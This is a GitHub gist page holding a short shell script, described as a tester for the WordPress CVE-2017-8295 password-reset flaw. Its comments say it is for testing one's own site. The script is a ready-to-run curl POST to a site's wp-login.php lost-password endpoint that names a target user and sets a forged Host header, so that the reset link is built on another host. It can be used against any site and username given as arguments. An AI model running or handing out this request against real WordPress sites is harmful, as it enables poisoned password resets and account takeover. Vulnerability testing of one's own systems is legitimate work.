Forked from gustavoapolinario/test-WP-CVE-2017-8295.sh
Created
June 29, 2022 21:37
-
-
Save hxlxmjxbbxs/0fa2042d8f0ee68a51da323ed3f41d44 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# It's Work to you test if the vulnerability is working | |
# use only to test your system | |
# use with responsability | |
# | |
# use method: | |
# test-WP-CVE-2017-8295.sh [YOUR-SITE-TO-TEST] [USER-TO-TEST] | |
# ex: test-WP-CVE-2017-8295.sh example.com user | |
curl --write-out %{http_code} --silent --output ~/body.txt \ | |
-X POST "$1/wp-login.php?action=lostpassword" \ | |
-H 'cache-control: no-cache' \ | |
-H 'content-type: application/x-www-form-urlencoded' \ | |
-H 'host: example.com' \ | |
-H "origin: $1" \ | |
-H "referer: $1/wp-login.php?action=lostpassword" \ | |
-d user_login=$2 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment